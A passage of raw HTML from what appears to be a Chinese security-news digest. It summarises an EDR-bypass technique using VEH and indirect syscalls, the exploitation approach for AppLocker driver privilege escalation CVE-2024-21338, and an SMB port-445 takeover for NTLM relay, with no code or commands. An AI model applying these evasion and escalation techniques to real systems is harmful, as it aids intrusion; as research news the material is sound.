		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsBjKXx8cDO8liaaF7MglMAldRLYsoAhTJgXcI8iav7NicHK23CjZryFTdA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsBjKXx8cDO8liaaF7MglMAldRLYsoAhTJgXcI8iav7NicHK23CjZryFTdA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122828851128154"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">EDR 产品通常通过在 ntdll.dll 或 kernel32.dll 中放置用户态钩子来监控系统调用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">绕过 EDR 的常见方法包括重新映射 ntdll.dll、直接系统调用和间接系统调用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">LayeredSyscall 利用 VEH 来生成合法的调用栈，通过间接系统调用绕过 EDR 钩子。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">LayeredSyscall 通过两个 VEH 处理程序来实现其功能，分别用于设置硬件断点和生成调用栈。</section></li></ul>
	<br/>
	<p>🏷️: EDR绕过, VEH, 间接系统调用, 安全研究</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 Windows AppLocker驱动LPE漏洞CVE-2024-21338</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了 Windows 系统中的 AppLocker 驱动程序中的一个特权提升漏洞（CVE-2024-21338），该漏洞允许攻击者通过操纵内核指针和数据来提升权限。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows AppLocker 驱动程序提权漏洞 CVE-2024-21338</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows内核提权漏洞CVE-2024-21338分析</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsG62Lznk72o3KxjJX33mCyCOia7KyibX9DHNBBfAeq4iaekVliaOTcuD8pw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsG62Lznk72o3KxjJX33mCyCOia7KyibX9DHNBBfAeq4iaekVliaOTcuD8pw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844184485821418"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞利用：攻击者可以通过触发 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">AppHashComputeImageHashInternal</code> 函数来控制 RIP，从而实现特权提升。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全机制绕过：由于 SMEP 和 kCFG 的保护，攻击者需要找到有效的内核空间指针和利用特定的函数来执行数据只攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">KASLR 问题：在 LocalService 用户上下文中，KASLR 不是主要障碍，可以通过 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">NtQuerySystemInformation</code> 系统调用来获取必要的内核地址。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">驱动程序加载：攻击者可以通过服务管理器或 AppLocker 相关的 ETW 提供程序来加载 appid.sys 驱动程序。</section></li></ul>
	<br/>
	<p>🏷️: 漏洞, Windows, 驱动, 权限提升, AppLocker</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 基于Python的445/tcp端口接管技术</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">SMBTakeover 是一种不需要加载驱动、加载 LSASS 模块或重启目标机器的技术，它通过在 Windows 系统上取消绑定并重新绑定 445/tcp 端口，用于简化 SMB 相关的 NTLM 中继攻击，特别是在通过 C2 通道时。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=e1ae1fb0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZkIWNibegTVbjl4P8oUnsxdsjNZiaakAjzNiaK0U57mia4eqcWtlhBaWQ2sKMnJlOzH8dUoNDQAnWbA0A%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:x33fcon的那个 smb 工具放出来了, 优势不需要重启机器</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过SCM交互在Windows上解除445/tcp绑定的BOF和Python3实现</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsgvcjDiaav4yFJcdIGYricGxJNVgKc0l8xQX1P7Wmgn2icHicHKw4h44tIA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZkIWNibegTVbjl4P8oUnsxdsgvcjDiaav4yFJcdIGYricGxJNVgKc0l8xQX1P7Wmgn2icHicHKw4h44tIA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855185582255581"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">SMBTakeover 技术提供了一种无需重启目标机器的方法来取消绑定和重新绑定 SMB 服务的 445/tcp 端口，以便进行 NTLM 中继攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该技术的实现依赖于 RPC over TCP 传输协议，以确保与远程目标的通信。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">在使用 SMBTakeover 技术时，需要考虑目标机器的重要性和功能，因为禁用相关服务可能会影响其正常运行，尤其是在生产环境中。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尽管提供了 PoC，但用户可以选择其他工具与服务控制管理器交互，只要该工具支持 RPC over TCP 传输。</section></li></ul>
	<br/>
	<p>🏷️: 技术, Python, 网络安全, TCP, Windows</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 审计Atlassian插件：53个零日漏洞后的反思</span></h3>
